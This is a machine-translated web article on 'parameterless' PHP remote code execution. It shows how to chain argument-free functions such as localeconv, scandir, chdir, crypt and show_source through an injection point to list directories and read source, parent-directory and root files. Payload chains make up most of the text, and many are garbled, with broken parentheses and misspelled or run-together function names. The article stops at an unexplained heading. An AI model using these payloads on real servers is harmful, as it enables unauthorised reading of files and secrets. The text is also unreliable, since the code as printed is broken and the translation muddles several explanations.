Shulou(Shulou.com)05/31 Report--

It is believed that many inexperienced people are at a loss about how to understand the non-parameter reading file in php rce. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

1. What is no parameter?

That is, you cannot use a function with arguments.

It can be a (), a (b ()) or a (b (c (), but it cannot be a ('b') or a ('baked dint') with no parameters.

So we need to use functions with no arguments for file reading or command execution.

Second, no parameter file reading

View the current directory file name

In general, you can use print_r (scandir ('.')) View all files in the current directory and output as an array.

But how to construct this point in the parameter.

The localeconv () function returns an array of local numbers and currency format information. And the first item of the array is.

Https://www.w3school.com.cn/php/func_string_localeconv.asp

Current () returns the cells in the array, default to the first value.

So we output print_r (scandir (current (localeconv (); it will also be like print_r (scandir ('.')). Print the file name under the current directory.

Use print_r (scandir (pos (localeconv ();, pos is an alias for current

The reset () function points the internal pointer to the first element in the array and outputs it.

Related methods:

So now we're going to construct the parameters of reset ().

Chr (46) is the character.. So we need to construct 46.

Chr (rand ()) # depends on luck. Unrealistic char (time ()) char (current (localtime (time ()

[tm_sec]-seconds

[tm_min]-minutes

[tm_hour]-hour

[tm_mday]-the day of the month

[tm_mon]-the month ordinal of the year, indicating January from 0

[tm_year]-year, starting from 1900

[tm_wday]-Day of the week (Sunday=0)

[tm_yday]-Day of the year

[tm_isdst]-whether daylight saving time is currently in effect

Chr (time ())

The chr () function has a period of 256, so chr (46), chr (302) and chr (558) are all equal to.

So using chr (time ()) must occur once a cycle.

Chr (current (localtime (time ()

Localtime () outputs the local time as a numeric array and an associative array:

The key name of the associative array is as follows:

The first value of the array is added by 1 per second, so you can get 46. 5% in 60 seconds at most. Then use the current () function to get the first key value. Then you can get it perfectly by using the chr () function.

Current ()-returns the value of the current element in the array

End ()-points the internal pointer to the last element in the array and outputs

Next ()-points the internal pointer to the next element in the array and outputs

Prev ()-points the internal pointer to the previous element in the array and outputs

Each ()-returns the key name and key value of the current element and moves the internal pointer forward

Phpversion () returns the PHP version, for example 5.4.45

Floor (phpversion ()) returns 5

Sqrt (floor (phpversion () returns 2.2360679774998

Tan (floor (sqrt (floor (phpversion ()) returns-2.1850398632615)

Cosh (tan (floor (sqrt (floor (phpversion ()) returns 4.5017381103491)

Sinh (cosh (tan (floor) (sqrt (floor (phpversion ()) returns 45.081318677156

Ceil (sinh (cosh (tan) (floor) (sqrt (floor (phpversion ()) returns 46

Chr (ceil (sinh (cosh) (floor (phpversion ()) returns "."

Crypt () returns a string encrypted using the DES, Blowfish, or MD5 algorithm.

The hebrevc () function converts Hebrew text from a right-to-left stream to a left-to-right stream. At the same time, convert the new line (\ n) to

Hebrevc (crypt (arg)) can randomly generate a hash value, and the first character is randomly $(high probability) or "." (small probability) then only the first character / is fetched through chr (ord ())

Ord () returns the Ascii value of the first character in the string

Print_r (scandir (chr (ord) (hebrevc (crypt (time ()); try several times.

Strrev (crypt (serialize (array () can also get "." except that the dot of crypt (serialize (array () appears in the last character, you need to use strrev () in reverse order, and then use chr (ord ()) to get the first character.

Print_r (scandir (chr (ord) (strrev (crypt) (array ())

Absolute path

Normally, we can also use print_r (scandir ('absolute path'); to view the current directory file name.

Getcwd () and realpath ('.') are available to get the absolute path.

So we can also use print_r (scandir (getcwd (); to output all the file names of the current folder.

Read the current directory file

The file name of the current directory is output by the previous method. If the file cannot be displayed directly, such as PHP source code, we also need to use the function to read:

The previous method outputs an array, and the file name is the value of the array, so how do we get out the array that we want to read the file?

To get the contents of the last file, we can:

Show_source (end (scandir (getcwd (); # or use other functions readfilehighlight_filefile_get_contentsreadgzfile () # can also read files, often used to bypass filtering

Error Strict Standards: Only variables should be passed by reference in reason: the above PHP5.3 can only pass specific variables by default, but not through the returned value of the function. It does not affect us to read the file.

Array_reverse () returns the array in the reverse order of elements

The file that was originally in the last bit can be read in the first place.

Show_source (current (array_reverse (scandir (getcwd))

If it's the penultimate one, we can use:

Readfile (next (array_reverse (scandir (getcwd))

I thought I could continue to use next (), but it didn't work.

So how to read other files

We can use array_rand (array_flip ()), where array_flip () is the key and value of the swap array, and array_rand () returns an array at random.

Readfile (array_rand (array_flip (scandir (getcwd ()); readfile (array_rand (array_flip (current (localeconve ()

What if the target file is not in the current directory?

Dirname (): returns the directory portion of the path

As you can see from the figure, if the value passed in is an absolute path (excluding the file name), the upper path is returned, and if the absolute path is passed in the file name, the current path of the file is returned.

Chdir (): change the current working directory

Print_r (scandir (dirname (getcwd (); / / View the files in the directory above

Construct ".."

Print_r (next (scandir (getcwd ();: the second array in our scandir (getcwd ()) is "..", so you can get it with next ().

Print_r (scandir (next (scandir (getcwd ()); / / you can also view the superior directory file

Combined with some of the structures mentioned above, we can get ".." Of:

Next (scandir (chr (ord) (hebrevc (crypt (time ())

Read the parent directory file

Direct print_r (readfile (array_rand (scandir (dirname (getcwd ();)) is not allowed, and an error will be reported, because the default is to find and read this file in the current working directory, and the file is in the upper directory, so change the current working directory first, write chdir () before, and use:

Show_source (array_rand (array_flip (scandir) (dirname (chdir) (getcwd ())

If you cannot use dirname (), you can use the construct ".." Switch paths and read:

But here getcwd () and localeconv () cannot accept parameters after switching paths, because syntax does not allow us to use the previous hebrevc (crypt (arg)).

Show_source (array_rand (scandir (chr) (ord (crypt (chdir (scandir (getcwd ()); or more complex: show_source (array_rand (array_flip (scandir) (ord (hebrevc (chdir (scandir (chr)) (hebrevc (crypt (phpversion () You can also use show_source (array_rand (scandir (scandir (current) (localtime (chdir (chdir (scandir (localeconv (), otherwise the manual refresh will take a long time. If the file is positive or penultimate, it is best to locate it directly.

And:

If (chdir (next (scandir (getcwd () show_source) array_rand (array_flip (getcwd ())

View and read root directory files

Print_r (scandir (chr (ord) (strrev (crypt) (array ())

The first bit of a string obtained by strrev (crypt (serialize (array () is likely to be /, so you can use the above payload to view the root directory file.

But there are permission restrictions, the linux system needs certain permissions to read, so it may not be successful.

If (chdir (ord) (strrev (crypt (serialize (array () print_r (scandir (getcwd (); if (chdir (ord (strrev (serialize (array) show_source) (array_rand (scandir (getcwd ()

The array_flip () function is used to reverse / exchange the key name and the corresponding associated key value in the array.

The array_rand () function returns random key names in an array, or an array containing random key names if you specify that the function return more than one key name.

End ()-points the internal pointer of the array to the last cell

Key ()-gets the key name from the associative array

Each ()-returns the current key / value pair in the array and moves the array pointer one step forward

Prev ()-reverses the internal pointer of the array to one bit

Reset ()-points the internal pointer of the array to the first cell

Next ()-moves the internal pointer in the array forward one bit

Using wildcard temporary files

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.